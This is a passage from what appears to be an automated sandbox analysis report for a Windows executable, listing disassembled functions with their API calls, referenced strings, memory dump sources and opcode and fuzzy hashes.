                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$AllocClearInitString_com_issue_error
                                • String ID: ComponentHost
                                • API String ID: 1237638183-3610559101
                                • Opcode ID: ace70aeb85330e516d0da698db3344a9e1a35e439cf2979af6b1ed0db432e0d7
                                • Instruction ID: 9d5f04b1b00ed6a2f15a151ac3522d0db1919fbf0d9f8f2b6a8e6023aa2de4be
                                • Opcode Fuzzy Hash: ace70aeb85330e516d0da698db3344a9e1a35e439cf2979af6b1ed0db432e0d7
                                • Instruction Fuzzy Hash: 0E51D674E04348DFDB11DFA8CC45BAEB7B8FF09714F10826AEA05AB281E774A940C795
                                Function 003F6F50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                  • Part of subcall function 003F9ED0: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 003F9F93
                                • GetCurrentThreadId.KERNEL32 ref: 003F6FE6
                                • SysFreeString.OLEAUT32(?), ref: 003F7017
                                • SysFreeString.OLEAUT32(?), ref: 003F7021
                                • SysFreeString.OLEAUT32(?), ref: 003F702B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$AllocCurrentMtx_init_in_situThread
                                • String ID: signal_event
                                • API String ID: 3845081946-4093753797
                                • Opcode ID: 7641d2c59ce0bd4fa6bb17bc29474badae18cf62fa39bef3668b60e52370e79c
                                • Instruction ID: 14866e5d540d152afdd2eb9e2e39cca649ad5f27cd53766b36a14513503a382e
                                • Opcode Fuzzy Hash: 7641d2c59ce0bd4fa6bb17bc29474badae18cf62fa39bef3668b60e52370e79c
                                • Instruction Fuzzy Hash: E6416075E0421D9BCF15DFA8D981AAEBBF9FF08310F14416AE901AB341DB35AD00CBA0
                                Function 003E5E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • OpenSemaphoreW.KERNEL32(001F0003,00000000,?,?,?,?,00000000,004614D0,?), ref: 003E5E89
                                • GetLastError.KERNEL32 ref: 003E5E95
                                • CloseHandle.KERNEL32(00000000), ref: 003E5F00
                                • CloseHandle.KERNEL32(00000000), ref: 003E5F3B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CloseHandle$ErrorLastOpenSemaphore
                                • String ID: _p0
                                • API String ID: 3583359621-2437413317
                                • Opcode ID: bce2ac7c8ef68dc8dbf41597dedccee11b88a51b8135992db707ad45b1177387
                                • Instruction ID: 39cd33be2e6472e59df7f9e7a33d8aa5df94de1eaf0bec04b714e7ec3ce78ec3
                                • Opcode Fuzzy Hash: bce2ac7c8ef68dc8dbf41597dedccee11b88a51b8135992db707ad45b1177387
                                • Instruction Fuzzy Hash: D13104752146549BD716EF26EC45BAB73EAEFC9310F10472CF8088B2C1EB309E01C6A6
                                Function 00404B60 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                • ___std_exception_copy.LIBVCRUNTIME ref: 00404C32
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise___std_exception_copy
                                • String ID: 0q>$@ >$`I@$directory_iterator::operator++
                                • API String ID: 3109751735-3075673613
                                • Opcode ID: 1545a5334c7f1759df6d2bee6d4cb18745119cf8f6aaada5e1e74260f55bc2d3
                                • Instruction ID: 471c2aebfbd849508c93e2fd0bced2b2833431948058e6adf8d2a67cf58fbb36
                                • Opcode Fuzzy Hash: 1545a5334c7f1759df6d2bee6d4cb18745119cf8f6aaada5e1e74260f55bc2d3
                                • Instruction Fuzzy Hash: CD317EB1900608EFC710DF55DD41B86FBFCFB19710F50866AE915A3681EBB4BA08CBA4
                                Function 004213D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                • ___tlregdtor.LIBCMT ref: 00421479
                                • SetFilePointer.KERNEL32(?,?,00000000,00000001,A05DD77D,?,?,0043B3A0,000000FF), ref: 004214B1
                                • GetLastError.KERNEL32(?,?,0043B3A0,000000FF), ref: 004214D1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer___tlregdtor
                                • String ID: CORE$_TLD
                                • API String ID: 3194831421-4220718512
                                • Opcode ID: 080f3b2184b3006a4553958c9f1504cdf603a48b63e34361caca2850cc2468ad
                                • Instruction ID: fc4eefdf920fa33f7396e2d6d7ac44169258fda274b1a28bd8d3ef3a7f0a6a85
                                • Opcode Fuzzy Hash: 080f3b2184b3006a4553958c9f1504cdf603a48b63e34361caca2850cc2468ad
                                • Instruction Fuzzy Hash: 5D319F71A04B64EFD721DF24D800BA7B7E4FB05B20F504A2EE96F877A0D77964008B96
                                Function 00421270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72fileCOMMON
                                Download Yara Rule
                                APIs
                                • ___tlregdtor.LIBCMT ref: 0042131A
                                • ReadFile.KERNEL32(?,?,00000000,?,00000000,A05DD77D,?,?,?,0043A5D0,000000FF), ref: 00421342
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FileRead___tlregdtor
                                • String ID: CORE$_TLD
                                • API String ID: 3805497070-4220718512
                                • Opcode ID: 0bdf14da2e6ed0f9d3f564b47db03110a574a4e1ee80a7b244e903eea2bdd58b
                                • Instruction ID: 3a1c4b119da3ef676939bc5e4e5c840181d89d72c24619520aea99cd63b591c4
                                • Opcode Fuzzy Hash: 0bdf14da2e6ed0f9d3f564b47db03110a574a4e1ee80a7b244e903eea2bdd58b
                                • Instruction Fuzzy Hash: 7431A071A04B54EFE721CF64D801B9BB7F4FB08710F004A6EE86A87790DBB96400CB96
                                Function 0040DF40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71timeCOMMON
                                Download Yara Rule
                                APIs
                                • QueryUnbiasedInterruptTime.KERNEL32(?,A05DD77D,?,00000000,?,0043D290,000000FF,?,0040DE6F,?), ref: 0040DEBC
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040DEEF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InterruptQueryTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: 0D$trust$update_cache
                                • API String ID: 2902542638-46904128
                                • Opcode ID: 9af4183fd37b0497d985f96bd6b8bca3cd72bd141d521e451e4744f90b2499d5
                                • Instruction ID: 951ad9142fb281c5aedca00f5361b68a1597a5c826cac8b65b48a34ab7a41dca
                                • Opcode Fuzzy Hash: 9af4183fd37b0497d985f96bd6b8bca3cd72bd141d521e451e4744f90b2499d5
                                • Instruction Fuzzy Hash: 2E217C75A00608AFD714DFA9DC85FABBBF8FB4D710F10466AF905A7290D775A800CB94
                                Function 00428BF2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(00000000,?,?,?,00428CB3,00000000,00442280,?,00000000,?,00428D65,00000002,FlsGetValue,00442278,00442280,00000000), ref: 00428C82
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: api-ms-
                                • API String ID: 3664257935-2084034818
                                • Opcode ID: f5ca089392f4164d36b75d90487cebb2fb09a6c177f3b12d24c2e35dbdbb7747
                                • Instruction ID: cf790e74713325d114bbdac416e9a3871f6a1129ca0435b6489cf9e5f64edd11
                                • Opcode Fuzzy Hash: f5ca089392f4164d36b75d90487cebb2fb09a6c177f3b12d24c2e35dbdbb7747
                                • Instruction Fuzzy Hash: 2411C435B43230ABDB224B69AC4575E33549F02760F640166FA05A7380DB78ED0086ED
                                Function 003F2A00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • FindWindowExW.USER32(00000000,00000000,#32770,00000000), ref: 003F2A2B
                                • GetPropW.USER32(00000000,WebViewContainerAppName), ref: 003F2A39
                                • GlobalGetAtomNameW.KERNEL32(00000000,?,00000104), ref: 003F2A50
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AtomFindGlobalNamePropWindow
                                • String ID: #32770$WebViewContainerAppName
                                • API String ID: 2291018682-3746687551
                                • Opcode ID: 624adc244acf461daf36f7193796e78c0c8102e41d7a58b40ad43cc0cfc89a00
                                • Instruction ID: 04566f68faa3edcd623203f46783239a67d24a9ea97ce79e419a05980410b0f1
                                • Opcode Fuzzy Hash: 624adc244acf461daf36f7193796e78c0c8102e41d7a58b40ad43cc0cfc89a00
                                • Instruction Fuzzy Hash: D2012B36B40218A7DA21EBA6AC4AFABB398EF55711F51016AFE04DB1C1ED709D1483A4
                                Function 0042EC67 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A05DD77D,?,?,00000000,0043A5B0,000000FF,?,0042EC3A,00000002,eB,0042EC0E,eB), ref: 0042EC9C
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042ECAE
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,0043A5B0,000000FF,?,0042EC3A,00000002,eB,0042EC0E,eB), ref: 0042ECD0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: 0977ad62dc4601cc6e690d0c2fdd558438532dab19dbeb08c332b56190597e84
                                • Instruction ID: 83d070c1dc2948f266ea48502ee25f0f024d050a23e71bd8985b8323ecf34afa
                                • Opcode Fuzzy Hash: 0977ad62dc4601cc6e690d0c2fdd558438532dab19dbeb08c332b56190597e84
                                • Instruction Fuzzy Hash: 2301A235A00629EFDB119F92DC05BAFBBB8FB05B11F000536F911A23D0DBB99910CA98
                                Function 003F2980 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • GlobalDeleteAtom.KERNEL32(?), ref: 003F29A9
                                • GlobalAddAtomW.KERNEL32(00000000), ref: 003F29B2
                                • GetLastError.KERNEL32 ref: 003F29C2
                                Strings
                                • WebViewContainerAppName, xrefs: 003F29DC
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AtomGlobal$DeleteErrorLast
                                • String ID: WebViewContainerAppName
                                • API String ID: 3166071000-1640168891
                                • Opcode ID: a29dc4d45c3eeb9e46eaf7265e19f626ce4c7e2773da92cf50373c4b5ec942c4
                                • Instruction ID: f731f322c338ac36118a90c5995feec08c7d72957bdfb2e9337e05cec2f4cb14
                                • Opcode Fuzzy Hash: a29dc4d45c3eeb9e46eaf7265e19f626ce4c7e2773da92cf50373c4b5ec942c4
                                • Instruction Fuzzy Hash: 17F06D79140609DBDB51AB95FC08B7777A8BB50361F41C126FA88DB060D7BAC8B0DB78
                                Function 00432C35 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                Download Yara Rule
                                APIs
                                • __alloca_probe_16.LIBCMT ref: 00432CBC
                                • __alloca_probe_16.LIBCMT ref: 00432D7D
                                • __freea.LIBCMT ref: 00432DE4
                                  • Part of subcall function 0043023B: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0043026D
                                • __freea.LIBCMT ref: 00432DF9
                                • __freea.LIBCMT ref: 00432E09
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 1423051803-0
                                • Opcode ID: 69a5eba164a3dd2779e53ff7e74a4366de8de3fe2be9096bd272c75b99f82cff
                                • Instruction ID: e742e182d1483abe86c7713669577c90f4501bd5df134f5f19e2308596e2f50e
                                • Opcode Fuzzy Hash: 69a5eba164a3dd2779e53ff7e74a4366de8de3fe2be9096bd272c75b99f82cff
                                • Instruction Fuzzy Hash: 9751C472600116AFEB209E66DD82EBF36A9EF08354F25112AFC04D7210EAB8CD118769
                                Function 0041EB40 Relevance: 7.6, APIs: 5, Instructions: 136fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,A05DD77D), ref: 0041EB9B
                                • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,02000000,00000000), ref: 0041EC50
                                • CloseHandle.KERNEL32(00000000), ref: 0041ECAC
                                • GetLastError.KERNEL32 ref: 0041ECDF
                                • GetLastError.KERNEL32 ref: 0041ED06
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$CloseCreateFileHandle
                                • String ID:
                                • API String ID: 614986841-0
                                • Opcode ID: 8634cc2be035cbb0032fdaf12e36042523111876e64471be8bd27d29ec06f0ea
                                • Instruction ID: 7bfc1930e99ba8f9af3a77fc4d727bd5bf6da214558acfc95d8b0d15a51b7a9f
                                • Opcode Fuzzy Hash: 8634cc2be035cbb0032fdaf12e36042523111876e64471be8bd27d29ec06f0ea
                                • Instruction Fuzzy Hash: 2951A3B49013059FD7208F56DC48B9ABBF4FB04714F1084AEE95A97390E7B89984CF59
                                Function 003F3D00 Relevance: 7.6, APIs: 5, Instructions: 118memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysFreeString.OLEAUT32(00000000), ref: 003F3D50
                                • VariantClear.OLEAUT32(?), ref: 003F3D7A
                                • SysAllocString.OLEAUT32(?), ref: 003F3D96
                                • VariantInit.OLEAUT32(?), ref: 003F3DE4
                                • VariantClear.OLEAUT32(?), ref: 003F3E32
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ClearString$AllocFreeInit
                                • String ID:
                                • API String ID: 695394290-0
                                • Opcode ID: 872f689b4f0084a56579b28d001137ff34785ca4a72967cb18021a21e6b53ccf
                                • Instruction ID: 414d438a7c6233382f34d26888efa5137ae14eab16ab33deb35018ab434d73d6
                                • Opcode Fuzzy Hash: 872f689b4f0084a56579b28d001137ff34785ca4a72967cb18021a21e6b53ccf
                                • Instruction Fuzzy Hash: 99416C759002599FCB11DFA9C804BAEBBF8FF48720F10866AFD15E7350E775AA108B94
                                Function 003F19B0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                Download Yara Rule
                                APIs
                                • SetLastError.KERNEL32(00000000), ref: 003F1A21
                                • MapWindowPoints.USER32(000701F0,00000000,?,00000001), ref: 003F1A38
                                • GetLastError.KERNEL32 ref: 003F1A42
